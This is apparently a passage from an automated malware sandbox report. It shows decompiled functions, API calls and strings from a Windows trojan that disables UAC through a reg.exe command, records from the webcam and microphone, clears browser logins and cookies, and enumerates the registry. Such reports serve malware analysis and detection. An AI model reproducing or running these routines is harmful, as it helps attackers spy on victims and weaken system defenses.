				L00432C12(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E004321CB(_t29, _t32, _t37);
				if(_t25 != 0) {
					L00431969(_t25, _t30);
					return _t25;
				}
				return _t25;
			}

0x004323c1
0x004323c1
0x004323c4
0x004323c9
0x004323cc
0x004323ce
0x004323d1
0x004323d4
0x004323d5
0x004323d5
0x004323d8
0x004323dd
0x004323dd
0x004323e0
0x004323e4
0x004323e4
0x004323e7
0x004323ec
0x004323e9
0x004323e9
0x004323e9
0x004323ef
0x004323f5
0x004323f8
0x004323fa
0x004323fd
0x00432400
0x00432401
0x0043240a
0x0043240f
0x00432412
0x00432418
0x0043241b
0x0043241e
0x00432421
0x00432422
0x00432425
0x00432430
0x00432434
0x00000000
0x00432434
0x0043243b

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004323D8

Part of subcall function 00432A10: ___AdjustPointer.LIBCMT ref: 00432A5A

_UnwindNestedFrames.LIBCMT ref: 004323EF
___FrameUnwindToState.LIBVCRUNTIME ref: 00432401
CallCatchBlock.LIBVCRUNTIME ref: 00432425

Strings

'C, xrefs: 004323E4, 004323D5

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID: 'C
API String ID: 2633735394-3508614867
Opcode ID: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
Instruction ID: 4bf94517400e507f126a9367288ab0f2e195edd9a7e9a1c48657146a10e0d39d
Opcode Fuzzy Hash: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
Instruction Fuzzy Hash: D9011732000108BBCF126F56DD01EDB3BBAEF4C754F04501AFE1862121C3BAE861EBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5BF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,0046B558,0046B594,00000001), ref: 0040D603
CloseHandle.KERNEL32(?), ref: 0040D612
CloseHandle.KERNEL32(?), ref: 0040D617

Strings

C:\Windows\System32\cmd.exe, xrefs: 0040D5FE
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040D5F9

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: 8e41dbfb243193b7cf79613587b0d8195d79e50b0d3010cdf0d3e9548784713f
Instruction ID: 41c2c0f4322c1ecd4c56569211eebc0a1d0ede0d5e8c510c6d149c3dff1ea256
Opcode Fuzzy Hash: 8e41dbfb243193b7cf79613587b0d8195d79e50b0d3010cdf0d3e9548784713f
Instruction Fuzzy Hash: D8F062B290021C7EEB006BE9DC85EEFBB7CEB48795F000437F604E6021D5705D088AA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040504B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040504B(void* __ecx, void* __edi) {
				void* __ebx;
				long _t13;
				intOrPtr _t27;
				void* _t28;
				void* _t29;
				void* _t30;
				intOrPtr _t37;

				_t28 = __edi;
				_t29 = __ecx;
				 *((intOrPtr*)(__ecx + 0x60)) = 0;
				if( *((intOrPtr*)(__ecx + 0x5c)) <= 0) {
					L3:
					 *((char*)(_t29 + 0x50)) = 0;
					_t37 =  *0x46ab07; // 0x0
					if(_t37 != 0) {
						_t31 = _t30 - 0x18;
						L00401FCE(0, _t30 - 0x18, "Connection timeout");
						L00401FCE(0, _t31 - 0x18, "[WARNING]");
						_t13 = L00416673(0, _t28);
					}
					L00404CC1(_t13, _t29);
					return 1;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t13 = WaitForSingleObject( *(_t29 + 0x54), 0x3e8);
					 *((intOrPtr*)(_t29 + 0x60)) =  *((intOrPtr*)(_t29 + 0x60)) + 1;
					_t27 =  *((intOrPtr*)(_t29 + 0x60));
					if(_t13 == 0) {
						break;
					}
					if(_t27 <  *((intOrPtr*)(_t29 + 0x5c))) {
						continue;
					}
					goto L3;
				}
				CloseHandle( *(_t29 + 0x54));
				 *(_t29 + 0x54) = 0;
				 *((char*)(_t29 + 0x50)) = 0;
				SetEvent( *(_t29 + 0x58));
				return 0;
			}

0x0040504b
0x0040504d
0x00405051
0x00405057
0x00405076
0x00405076
0x00405079
0x0040507f
0x00405081
0x0040508b
0x0040509a
0x0040509f
0x004050a4
0x004050a9
0x00000000
0x00000000
0x00000000
0x00000000
0x00405059
0x00405059
0x00405061
0x00405067
0x0040506a
0x0040506f
0x00000000
0x00000000
0x00405074
0x00000000
0x00000000
0x00000000
0x00405074
0x004050b7
0x004050c0
0x004050c3
0x004050c6
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,00405046), ref: 00405061
CloseHandle.KERNEL32(?), ref: 004050B7
SetEvent.KERNEL32(?), ref: 004050C6

Strings

[WARNING], xrefs: 00405095
Connection timeout, xrefs: 00405086

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection timeout$[WARNING]
API String ID: 2055531096-1470507543
Opcode ID: 8193afecf41830fae5e5c7a3f49dc40d2f48edbad2bf1d21cf380978a62f7cf8
Instruction ID: b9cb3d6f7bb1318bd2f52e1bbc8d03a5a13b5e31c99cfcb00f9c073fc6f20acc
Opcode Fuzzy Hash: 8193afecf41830fae5e5c7a3f49dc40d2f48edbad2bf1d21cf380978a62f7cf8
Instruction Fuzzy Hash: A801D831601B40ABDB257F36895241FBBD1EF02305700483FE48352AA2C7B9D404DF8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B817, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040B822
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040B861

Part of subcall function 0042FA5D: _Yarn.LIBCPMT ref: 0042FA7C
Part of subcall function 0042FA5D: _Yarn.LIBCPMT ref: 0042FAA0

std::bad_exception::bad_exception.LIBCMT ref: 0040B879
__CxxThrowException@8.LIBVCRUNTIME ref: 0040B887

Strings

bad locale name, xrefs: 0040B871

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
String ID: bad locale name
API String ID: 3706160523-1405518554
Opcode ID: f72b975d74b369f5d9d46d712af33c68d1b2c45ebebf6efbbe6b702dcdad0188
Instruction ID: d6ae89db4c736c9ee486c46f109dd80eb12be191a14f2ff836d9438f69273f78
Opcode Fuzzy Hash: f72b975d74b369f5d9d46d712af33c68d1b2c45ebebf6efbbe6b702dcdad0188
Instruction Fuzzy Hash: D0F0363190060456C724FAB1EC52D9A77749F14718F50493FF40A224D2EF79A50CCA89

Uniqueness

Uniqueness Score: -1.00%

Function 00404360, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 201
sleepCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00404360(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char** _a8, signed int _a12) {
				char _v8;
				void* _v40;
				char _v44;
				char _v52;
				char _v60;
				char _v76;
				void* __esi;
				void* __ebp;
				void* _t25;
				char** _t27;
				intOrPtr* _t29;
				intOrPtr _t45;
				signed int _t54;
				signed int _t56;
				char* _t59;
				void* _t63;
				signed int _t64;
				void* _t66;
				signed int _t75;
				void* _t78;
				void* _t124;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t135;
				void* _t138;
				void* _t139;
				intOrPtr* _t140;

				_push(__edi);
				_t120 = _a8;
				_t124 = __ecx;
				_t25 = L00402711(__ecx, _a8);
				_t78 = _t124;
				_t146 = _t25;
				if(_t25 == 0) {
					_push(__ebx);
					L004027F0(_t78, __edx, 0);
					_t27 = E00402189();
					_t75 = _a12;
					_a8 = _t27;
					_t115 =  *_t27;
					__eflags =  !_t115 - _t75;
					if( !_t115 <= _t75) {
						L0040280F(_t124);
						asm("int3");
						_push(_t124);
						_t29 = L00401EF9( &_v8);
						E00404153( &_v8,  &_v44, 4, 0xffffffff);
						_t138 = (_t135 & 0xfffffff8) - 0xc;
						E00402036(_t75, _t138, _t115, __eflags, 0x46b218);
						_t139 = _t138 - 0x18;
						E00402036(_t75, _t139, _t115, __eflags,  &_v60);
						E00416EC5( &_v76, _t115);
						_t140 = _t139 + 0x30;
						_t126 =  *_t29 - 0x3c;
						__eflags = _t126;
						if(__eflags == 0) {
							_t127 = L00409D76(L00401EF9(L00401DAD( &_v52, _t115, __eflags, 0)));
							__eflags = _t127;
							if(_t127 != 0) {
								 *0x46aac4 = L00409DCC(_t127, "OpenCamera");
								 *0x46aac0 = L00409DCC(_t127, "CloseCamera");
								_t45 = L00409DCC(_t127, "GetFrame");
								_t115 = "FreeFrame";
								 *0x46aac8 = _t45;
								 *0x46aabc = L00409DCC(_t127, "FreeFrame");
								 *0x46aaaa = 1;
								E00402036(_t75, _t140 - 0x18, "FreeFrame", __eflags, 0x46b198);
								_push(0x1b);
								goto L23;
							}
						} else {
							_t128 = _t126 - 1;
							__eflags = _t128;
							if(_t128 == 0) {
								__eflags =  *0x46aa77;
								if(__eflags != 0) {
									goto L20;
								}
							} else {
								_t129 = _t128 - 1;
								__eflags = _t129;
								if(_t129 == 0) {
									 *0x46aac0();
									 *0x46aa77 = 0;
								} else {
									_t130 = _t129 - 1;
									__eflags = _t130;
									if(_t130 == 0) {
										_t54 =  *0x46aac4();
										 *0x46aa77 = _t54;
										__eflags = _t54;
										if(__eflags == 0) {
											goto L15;
										} else {
											L20:
											_t115 = L00435E19(_t49, L00401EF9(L00401DAD( &_v52, _t115, __eflags, 0)));
											L004045E2(_a4, _t51, __eflags);
										}
									} else {
										_t131 = _t130 - 1;
										__eflags = _t131;
										if(_t131 == 0) {
											_t56 =  *0x46aac4();
											 *0x46aa77 = _t56;
											__eflags = _t56;
											if(__eflags == 0) {
												L15:
												E00402036(_t75, _t140 - 0x18, _t115, __eflags, 0x46b198);
												_push(0x41);
												L23:
												L0040495D(_t75, _a4, _t115, __eflags);
											} else {
												_t59 = L00435E19(_t57, L00401EF9(L00401DAD( &_v52, _t115, __eflags, _t131)));
												 *_t140 = 0x3e8;
												Sleep(??);
												_t115 = _t59;
												L004045E2(_a4, _t59, __eflags);
												 *0x46aac0();
											}
										}
									}
								}
							}
						}
						L00401DD8( &_v52, _t115);
						L00401F11();
						L00401F11();
						__eflags = 0;
						return 0;
					} else {
						_t62 =  &(_t115[_t75]);
						_a12 =  &(_t115[_t75]);
						__eflags = _t75;
						if(__eflags != 0) {
							_push(0);
							_t64 = L0040274C(_t75, _t124, _t115, _t120, __eflags, _t62);
							__eflags = _t64;
							if(_t64 != 0) {
								_push( *_a8);
								_t66 = E00402173(_t124);
								E0040156F(E00402173(_t124) + _t75 * 2, _t66);
								_push(_t75);
								E0040155B(E00402173(_t124), _t120);
								L004027BF(_a12);
							}
						}
						_t63 = _t124;
						goto L7;
					}
				} else {
					_t63 = E0040346C(__ebx, _t124, __edx, _t120 - E00402173(_t78) >> 1, _t124, _t146, _t78, _t124, _t120 - E00402173(_t78) >> 1, _a12);
					L7:
					return _t63;
				}
			}

0x00404364
0x00404365
0x00404368
0x0040436b
0x00404370
0x00404372
0x00404374
0x0040438e
0x00404391
0x00404398
0x0040439d
0x004043a0
0x004043a3
0x004043a9
0x004043ab
0x0040440c
0x00404411
0x0040441e
0x0040441f
0x00404432
0x00404437
0x00404441
0x00404446
0x00404450
0x00404459
0x0040445e
0x00404461
0x00404461
0x00404464
0x00404557
0x00404559
0x0040455b
0x0040456e
0x0040457f
0x00404586
0x0040458b
0x00404590
0x0040459f
0x004045a6
0x004045b2
0x004045b7
0x00000000
0x004045b7
0x0040446a
0x0040446a
0x0040446a
0x0040446d
0x00404509
0x00404510
0x00000000
0x00000000
0x00404473
0x00404473
0x00404473
0x00404476
0x004044f7
0x004044fd
0x00404478
0x00404478
0x00404478
0x0040447b
0x004044e6
0x004044ec
0x004044f1
0x004044f3
0x00000000
0x004044f5
0x00404516
0x00404532
0x00404534
0x00404534
0x0040447d
0x0040447d
0x0040447d
0x00404480
0x00404486
0x0040448c
0x00404491
0x00404493
0x004044d0
0x004044da
0x004044df
0x004045b9
0x004045bc
0x00404495
0x004044a7
0x004044ae
0x004044b5
0x004044be
0x004044c0
0x004044c5
0x004044c5
0x00404493
0x00404480
0x0040447b
0x00404476
0x0040446d
0x004045c5
0x004045ce
0x004045d6
0x004045db
0x004045e1
0x004043ad
0x004043ad
0x004043b0
0x004043b3
0x004043b5
0x004043b7
0x004043bc
0x004043c1
0x004043c3
0x004043ca
0x004043cc
0x004043dd
0x004043e7
0x004043ef
0x004043fc
0x004043fc
0x004043c3
0x00404401
0x00000000
0x00404403
0x00404376
0x00404387
0x00404404
0x00404407
0x00404407

APIs

Sleep.KERNEL32(00000000,?), ref: 004044B5

Part of subcall function 004045E2: __EH_prolog.LIBCMT ref: 004045E7

Strings

CloseCamera, xrefs: 00404569
GetFrame, xrefs: 0040457A
FreeFrame, xrefs: 0040458B
OpenCamera, xrefs: 0040455D

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
API String ID: 3469354165-3547787478
Opcode ID: edd9472640c18d4bf4596a6c9ee1e0326f59d11b4d627040bb30b0c0e65173c3
Instruction ID: 57ff9695c26244f4d53fc61754d3c53010d5332ebb25825488904f4ffb67b564
Opcode Fuzzy Hash: edd9472640c18d4bf4596a6c9ee1e0326f59d11b4d627040bb30b0c0e65173c3
Instruction Fuzzy Hash: 8951B4B16006016BCA04BB769D5A66E36659BC1348F00053FFA06BB7D2EE7C8A15C79F

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4DB, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 103
sleepCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040A4DB(void* __edi) {
				char _v5;
				char _v6;
				char _v7;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t18;
				void* _t36;
				intOrPtr _t40;
				char _t50;
				void* _t52;
				signed int _t53;
				signed int _t54;
				void* _t55;

				_t52 = __edi;
				_t54 = _t53 & 0xfffffff8;
				 *0x46aafd = 1;
				Sleep( *0x46aaf8);
				_v7 = 0;
				_t36 = 0;
				_v6 = 0;
				_v5 = 0;
				goto L1;
				do {
					do {
						L1:
						_t59 = _t36;
						if(_t36 == 0) {
							L2:
							_t36 = E0040A3C1(_t59);
						}
						_t60 = _t36;
						if(_t36 == 0) {
							_t36 = E0040A1E5(_t52, _t60);
						}
						_t61 = _v6;
						if(_v6 == 0) {
							_v6 = L00409FCA(_t36, _t52, _t61);
						}
						_t62 = _v7;
						if(_v7 == 0) {
							_v7 = L00409F3B(_t52, _t62);
						}
						_t50 = _v5;
						_t63 = _t50;
						if(_t50 == 0) {
							_t50 = L00409EAC(_t52, _t63);
							_v5 = _t50;
						}
						if(_t36 == 0 || _t36 == 0) {
							L16:
							Sleep(0x1388);
							_t18 = _v7;
							_t40 = _v6;
							_t50 = _v5;
						} else {
							_t18 = _v7;
							if(_t18 == 0 || _t50 == 0) {
								goto L16;
							} else {
								_t40 = _v6;
								if(_t40 == 0) {
									goto L16;
								}
							}
						}
						if(_t36 == 0) {
							goto L2;
						}
					} while (_t36 == 0 || _t18 == 0 || _t50 == 0);
					_t73 = _t40;
				} while (_t40 == 0);
				_t55 = _t54 - 0x18;
				L00401FCE(_t36, _t55, "\n[Cleared browsers logins and cookies.]\n");
				L0040A6A7(_t36, _t50);
				L00401FCE(_t36, _t55, "Cleared browsers logins and cookies.");
				_t56 = _t55 - 0x18;
				L00401FCE(_t36, _t55 - 0x18, "[Info]");
				L00416673(_t36, _t52);
				L00401FCE(_t36, _t56 + 0x18, 0x45e65c);
				_push(0xaf);
				L0040495D(_t36, 0x46b748, _t50, _t73);
				if( *0x46aafc != 0) {
					E00410470(0x46b4f8, L00401EF9(0x46b4f8), "FR", 1);
				}
				 *0x46aafd = 0;
				return 0;
			}

0x0040a4db
0x0040a4de
0x0040a4e9
0x0040a4f0
0x0040a4fc
0x0040a500
0x0040a502
0x0040a508
0x0040a508
0x0040a50c
0x0040a50c
0x0040a50c
0x0040a50c
0x0040a50e
0x0040a510
0x0040a515
0x0040a515
0x0040a517
0x0040a519
0x0040a520
0x0040a520
0x0040a526
0x0040a528
0x0040a52f
0x0040a52f
0x0040a537
0x0040a539
0x0040a540
0x0040a540
0x0040a544
0x0040a548
0x0040a54a
0x0040a551
0x0040a553
0x0040a553
0x0040a559
0x0040a573
0x0040a578
0x0040a57e
0x0040a582
0x0040a586
0x0040a55f
0x0040a55f
0x0040a565
0x00000000
0x0040a56b
0x0040a56b
0x0040a571
0x00000000
0x00000000
0x0040a571
0x0040a565
0x0040a58c
0x00000000
0x00000000
0x0040a58e
0x0040a5a6
0x0040a5a6
0x0040a5ae
0x0040a5b8
0x0040a5bd
0x0040a5c9
0x0040a5ce
0x0040a5d8
0x0040a5dd
0x0040a5ec
0x0040a5f1
0x0040a5fb
0x0040a607
0x0040a61c
0x0040a622
0x0040a623
0x0040a630

APIs

Sleep.KERNEL32 ref: 0040A4F0
Sleep.KERNEL32(00001388), ref: 0040A578

Strings

[Info], xrefs: 0040A5D3
[Cleared browsers logins and cookies.], xrefs: 0040A5B3
Cleared browsers logins and cookies., xrefs: 0040A5C4

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[Info]
API String ID: 3472027048-899236412
Opcode ID: 23d5c586b8364887e0e8af5c7435ae67861443416d3e955d2be8c9162fe2ee17
Instruction ID: 1162eaf65630b73ff1f80a7ba471c1cb554db4c265b71c3a63260d4ea9018ffb
Opcode Fuzzy Hash: 23d5c586b8364887e0e8af5c7435ae67861443416d3e955d2be8c9162fe2ee17
Instruction Fuzzy Hash: F031C5012183817ACA0567B658167AB6F815E93358F08447FFCC03B3D3D9BE4828976F

Uniqueness

Uniqueness Score: -1.00%

Function 00401B31, Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401B41
waveInOpen.WINMM(0046AAB0,000000FF,0046AA98,Function_00001C53,00000000,00000000,00000024), ref: 00401BD7
waveInPrepareHeader.WINMM(0046AA78,00000020), ref: 00401C2B
waveInAddBuffer.WINMM(0046AA78,00000020), ref: 00401C3A
waveInStart.WINMM ref: 00401C46

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID:
API String ID: 1356121797-0
Opcode ID: c54f9f18a9c35b650a8af80ce56f9f79844d113c43bf8ce89a12f23babcea92f
Instruction ID: e94878c7ae08c83a7fbbe5ee1ed74f9f587b4a005c9a38e3995349f7043de47e
Opcode Fuzzy Hash: c54f9f18a9c35b650a8af80ce56f9f79844d113c43bf8ce89a12f23babcea92f
Instruction Fuzzy Hash: 16210771610A009BC7059FEAEF15A1A7BA9EB99715700403BF505F6AB1FBB88460CF4F

Uniqueness

Uniqueness Score: -1.00%

Function 00445CBA, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00445CC3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00445CE6

Part of subcall function 0043E13D: RtlAllocateHeap.NTDLL(00000000,0042F6B9,?,?,00430DF7,?,?,00000000,?,?,0040B6B7,0042F6B9,?,?,?,?), ref: 0043E16F

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00445D0C
_free.LIBCMT ref: 00445D1F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00445D2E

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: eb5ac2f1f3a423d9837809a8c4c0c38ec38985ab496fcb9d1adc631c42c76bdb
Instruction ID: 770b50b20798046aa32e5b89d79ee1fb7bc9862c188010fdccfacd4be211053b
Opcode Fuzzy Hash: eb5ac2f1f3a423d9837809a8c4c0c38ec38985ab496fcb9d1adc631c42c76bdb
Instruction Fuzzy Hash: C601D8B2A01B147F3B2116B76C4CC7F696DDEC7B62B14412BF904C3242DE688D0281B9

Uniqueness

Uniqueness Score: -1.00%

Function 00440516, Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00435FA8,00000000,00000000,?,0043602C,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 0044051B
_free.LIBCMT ref: 00440550
_free.LIBCMT ref: 00440577
SetLastError.KERNEL32(00000000), ref: 00440584
SetLastError.KERNEL32(00000000), ref: 0044058D

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: ec0c4d66d672ce0151759cce2dd0ac2d5eaf8003370b20155887df73d5ffa217
Instruction ID: 13c8966898b26520ad1eae856b2568bda2fd0949e0e00269a97398a0cd9a7b1b
Opcode Fuzzy Hash: ec0c4d66d672ce0151759cce2dd0ac2d5eaf8003370b20155887df73d5ffa217
Instruction Fuzzy Hash: 4901FE77104B0177B711B6666C4991B1A2DDFD2375724052BFB04A2282FEBCCE35992E

Uniqueness

Uniqueness Score: -1.00%

Function 0044731C, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044731C(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x469188; // 0x469180
					if(_t23 != 0) {
						L0043E9A5(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x46918c; // 0x46a64c
					if(_t24 != 0) {
						L0043E9A5(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x469190; // 0x46a64c
					if(_t25 != 0) {
						L0043E9A5(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x4691b8; // 0x469184
					if(_t26 != 0) {
						L0043E9A5(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x4691bc; // 0x46a650
					if(_t27 != 0) {
						return L0043E9A5(_t6);
					}
				}
				return _t6;
			}

0x00447322
0x00447327
0x0044732b
0x00447331
0x00447334
0x00447339
0x0044733d
0x00447343
0x00447346
0x0044734b
0x0044734f
0x00447355
0x00447358
0x0044735d
0x00447361
0x00447367
0x0044736a
0x0044736f
0x00447370
0x00447373
0x00447379
0x00000000
0x00447381
0x00447379
0x00447384

APIs

_free.LIBCMT ref: 00447334

Part of subcall function 0043E9A5: HeapFree.KERNEL32(00000000,00000000,?,004475CF,00000000,00000000,00000000,00000000,?,00447873,00000000,00000007,00000000,?,00447DBE,00000000), ref: 0043E9BB
Part of subcall function 0043E9A5: GetLastError.KERNEL32(00000000,?,004475CF,00000000,00000000,00000000,00000000,?,00447873,00000000,00000007,00000000,?,00447DBE,00000000,00000000), ref: 0043E9CD

_free.LIBCMT ref: 00447346
_free.LIBCMT ref: 00447358
_free.LIBCMT ref: 0044736A
_free.LIBCMT ref: 0044737C

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4d1edb7beddebfb23b6ec0d4e3bb169a1d779a093042a4f5eb208805dff7647d
Instruction ID: 12788a9a48264fba0fec6931aa620cbe1505ba006ba0300bb3a358fa54824785
Opcode Fuzzy Hash: 4d1edb7beddebfb23b6ec0d4e3bb169a1d779a093042a4f5eb208805dff7647d
Instruction Fuzzy Hash: 5CF0C87210910067EB60DF5AE985D4733FDAE96720764080BF804D7240C778FC81E75D

Uniqueness

Uniqueness Score: -1.00%

Function 00443999, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

\^)|/, xrefs: 004439A1

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: \^)|/
API String ID: 0-265608074
Opcode ID: aa9778819ca9640b2a87970354c563dde4810a26a1ed0bb6aae3566eef2bc859
Instruction ID: 6b1bd2d02262bb917fe90d116075301239604a386bfdac8689cdf3643b9c36a3
Opcode Fuzzy Hash: aa9778819ca9640b2a87970354c563dde4810a26a1ed0bb6aae3566eef2bc859
Instruction Fuzzy Hash: 9D51D671900145ABEF11DFA5C845FEFBBB4EF49B1AF10005BE404B7292D779AA01CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041064E, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 004106B5
RegEnumKeyExW.ADVAPI32 ref: 004106E4
RegEnumValueW.ADVAPI32 ref: 00410784

Strings

[regsplt], xrefs: 00410810

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]
API String ID: 3554306468-4262303796
Opcode ID: 410ca9f1c9dfa7c6e55db7ed71b81f6bc2d4439b996ad6466bd291577762a9cf
Instruction ID: 408738406d1422985ad3bcb14fb4cce37635b02bdbbeb5696b68d6fd6b05728c
Opcode Fuzzy Hash: 410ca9f1c9dfa7c6e55db7ed71b81f6bc2d4439b996ad6466bd291577762a9cf
Instruction Fuzzy Hash: CD511C71900119AADB10EBA5DD81EEFB77DEF04704F10007AF605F2191EF786A89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00449D60, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00449E75

Part of subcall function 00449C65: __alloca_probe_16.LIBCMT ref: 00449CCE
Part of subcall function 00449C65: WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00449D2B
Part of subcall function 00449C65: __freea.LIBCMT ref: 00449D34

_free.LIBCMT ref: 00449DCB

Part of subcall function 0043E9A5: HeapFree.KERNEL32(00000000,00000000,?,004475CF,00000000,00000000,00000000,00000000,?,00447873,00000000,00000007,00000000,?,00447DBE,00000000), ref: 0043E9BB
